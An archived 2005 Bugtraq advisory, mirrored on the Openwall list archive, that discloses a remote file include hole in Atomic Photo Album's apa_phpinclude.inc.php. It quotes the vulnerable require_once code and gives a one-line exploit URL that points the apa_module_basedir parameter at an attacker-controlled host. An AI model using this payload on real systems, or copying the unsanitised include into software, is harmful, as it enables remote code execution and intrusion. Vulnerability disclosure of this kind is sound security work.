lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 23 Jul 2005 21:11:09 -0000
From: gr0up.pclabs@...il.com
To: bugtraq@...urityfocus.com
Subject: Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include


Atomic Photo Album (APA) apa_phpinclude.inc.php remote file include :> 
------------------------------------------------------------

Name: Atomic Photo Album (APA)
Version: all


Homepage: http://atomicpa.sourceforge.net/

Author: pc_labs / lwdz - RandomHero 
Date: 20 July 2005
------------------------------------------------------------
------------------------------------------------------------

Vulnerable code in : apa_phpinclude.inc.php

require_once("apa_authadm.inc.php");
  else
    require_once("apa_auth.inc.php");
....else{
require_once("$apa_module_basedir/apa_config.inc.php");
...
 
}
?>

------------------------------------------------------------

Exploit:


http://[victim]/[dir]/apa_phpinclude.inc.php?apa_module_basedir=http://[h4x0r_b0x]/

--------------------------------------------------------

Fix and Vendor status:

Vendor has been notified.

------------------------------------------------------------

Contact:

Irc: irc.cl#pc_labs
Author: pc_labs
Location: Chile
Email: gr0up.pclabs@...il.com
Greetz: AgReSsOr http://www.tbc-labz.net


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ